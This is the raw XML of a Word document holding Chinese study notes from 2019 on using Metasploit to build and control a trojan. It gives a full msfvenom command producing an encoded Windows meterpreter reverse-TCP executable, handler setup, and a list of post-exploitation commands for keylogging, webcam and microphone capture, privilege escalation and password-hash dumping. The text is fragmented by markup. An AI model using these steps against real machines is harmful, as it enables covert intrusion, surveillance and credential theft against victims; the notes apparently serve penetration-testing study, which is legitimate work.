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Metasploit 之木马的功能利用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Msfconsole 启动metasploit的命令行模式</w:t>
      </w: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·木马： 控制端（控制原程） ---------  服务端（木马程序）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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根据自己的IP生成一个木马（192.168.136.255）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:left="559" w:leftChars="266" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Century Gothic" w:hAnsi="Century Gothic" w:eastAsia="Century Gothic" w:cs="Century Gothic"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="F0F0F0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Century Gothic" w:hAnsi="Century Gothic" w:eastAsia="Century Gothic" w:cs="Century Gothic"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.136.255 LPORT=55555 -f exe &gt; abc.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:left="559" w:leftChars="266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这样会生成一个test.exe的木马程序，将此程序粘贴到其他的系统（例如我的window10）</w:t>
      </w:r>
    </w:p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------------------------------以下是在metasploit里面进行的---------------------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use exploit/multi/handler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使用handler这个模块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set PWYLOAD windows/meterpreter/reverse_tcp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使用这个shellcode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LHOST = 192.168.136.255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LPORT = 55555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这里天生成木马的IP和端口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先执行msf，后执行木马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下面将怎样使用木马：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注入进程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 木马随时可能被结束掉</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:leftChars="0" w:firstLine="1943" w:firstLineChars="694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 得到我们要注入的PID进程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:left="168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Migrate xxx 注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:left="168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 xml:space="preserve">远程桌面的开启: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run vnc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文件管理功能：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download  —— 下载文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:left="210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Edit  —— 编辑文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:left="210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Cat  —— 查看文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:left="210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Mkdir  —— 创建文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:left="210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Mv  —— 移动文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:left="210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Rm  —— 删除文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:left="210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Upload  —— 上传文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:left="210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rmdir  —— 删除文件夹</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:left="210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网络及系统操作：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arp  —— 看ARP缓冲表</w:t>
      </w:r>
    </w:p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Ifconfig  —— IP地址网卡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Getproxy  —— 获取代理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Netstat  —— 查看端口链接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Kill  —— 结束进程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  —— 查看进程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Reboot  —— 重启电脑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Reg  —— 修改注册表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Shell  —— 获取shell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Shutdown  —— 关闭电脑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Sysinfo  —— 获取电脑信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:left="1680"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 xml:space="preserve">用户操作和其他功能： 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enumdesktops  —— 窗体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 xml:space="preserve">Keyscan_start  —— 键盘记录开始 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Keyscan_dump  —— 键盘记录，下载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Ketscan_stop  —— 键盘记录停止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Uictl  —— 获取键盘鼠标控制权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Record_mic  —— 音频录制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Webcam_chat  —— 查看摄像头接口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Webcam_list  —— 查看摄像头列表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Webcam_stream  —— 摄像头视频获取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Getsystem  —— 获取高权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:left="2520" w:leftChars="0" w:firstLine="420" w:firstLineChars="0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Hashdump  —— 下载hash</w:t>
      </w:r>
    </w:p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例：  uictl disable keyboard 控制键盘输出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:left="420" w:leftChars="0"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unictl enable 释放键盘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="840" w:firstLineChars="3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音频录制：  apt-get install mplayer (已安装)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="2520" w:firstLineChars="9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record_mic -d 10 (后面的10表示10秒)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:firstLine="3080" w:firstLineChars="1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Mplayer 文件名（听所录的音）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8D4F4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="56B8D4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E217A"/>
    <w:rsid w:val="0DE6116E"/>
    <w:rsid w:val="188C2400"/>
    <w:rsid w:val="21A519B4"/>
    <w:rsid w:val="22557495"/>
    <w:rsid w:val="2EA75507"/>
    <w:rsid w:val="336F378D"/>
    <w:rsid w:val="38833649"/>
    <w:rsid w:val="38E42983"/>
    <w:rsid w:val="40243A4A"/>
    <w:rsid w:val="40266332"/>
    <w:rsid w:val="42874596"/>
    <w:rsid w:val="43FC0A26"/>
    <w:rsid w:val="45974A62"/>
    <w:rsid w:val="48B57938"/>
    <w:rsid w:val="4A1274AE"/>
    <w:rsid w:val="4D492133"/>
    <w:rsid w:val="564103BD"/>
    <w:rsid w:val="5662107C"/>
    <w:rsid w:val="57DA5FE2"/>
    <w:rsid w:val="609A06A7"/>
    <w:rsid w:val="60C267AF"/>
    <w:rsid w:val="69D6483E"/>
    <w:rsid w:val="77CE0BA8"/>
    <w:rsid w:val="77D262A7"/>
    <w:rsid w:val="7BC629FD"/>
    <w:rsid w:val="7C4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2019-07-24T11:14:00Z</dcterms:created>
  <dc:creator>柠檬不萌</dc:creator>
  <cp:lastModifiedBy>柠檬不萌</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-27T08:01:45Z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